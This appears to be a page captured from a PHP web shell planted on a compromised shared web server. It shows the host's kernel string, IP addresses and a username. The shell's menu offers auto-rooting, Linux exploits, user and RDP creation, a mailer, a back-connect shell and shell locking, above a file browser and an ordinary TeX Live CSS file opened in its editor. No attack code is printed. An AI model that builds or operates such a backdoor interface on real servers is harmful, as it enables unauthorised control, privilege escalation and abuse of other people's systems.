Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
texlive-doc /
texlive /
texlive-en /
[ HOME SHELL ]
Name
Size
Permission
Action
archive
[ DIR ]
drwxr-xr-x
.dict.pws.gz
2.74
KB
-rw-r--r--
ChangeLog
696
B
-rw-r--r--
Makefile
3.11
KB
-rw-r--r--
README
240
B
-rw-r--r--
live4ht.cfg
1.4
KB
-rw-r--r--
tex-live.css
1.1
KB
-rw-r--r--
tex-live.sty.gz
5.6
KB
-rw-r--r--
texlive-en.css
15.81
KB
-rw-r--r--
texlive-en.html
343.43
KB
-rw-r--r--
texlive-en.pdf
1.11
MB
-rw-r--r--
texlive-en.tex.gz
57.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tex-live.css
/* $Id: tex-live.css 3436 2007-01-13 22:34:01Z karl $ Simple CSS for TeX Live that adds margins and a little color. original by Bzyl Wlodzimierz, edited by Karl Berry, 2005. Public domain. */ html { // top left bottom right margin: 15pt 15pt 15pt 15pt; background: rgb(255,255,224); } body { margin: 0 5pt 0 5pt; padding: 0; //matw: background: rgb(224,255,224); // (It looks better to me to have a consistent background --karl) // fonts in browser are low resolution; // therefore generated serif are poor quality, // so they disturb reading (that is my opinion) font-family: sans-serif; font-style: normal; } /* (It looks better to me to not vary colors at every level --karl) */ h3.sectionHead { padding: 12pt 10pt 12pt 20pt; //matw: background: rgb(192,224,255); background: rgb(224,224,255); color: rgb(0,0,32); } h4.subsectionHead { padding: 7pt 10pt 7pt 40pt; background: rgb(224,224,255); color: rgb(0,0,32); } h5.subsubsectionHead { padding: 3pt 10pt 3pt 40pt; //matw: background: rgb(224,255,255); background: rgb(224,224,255); color: rgb(0,0,32); }
Close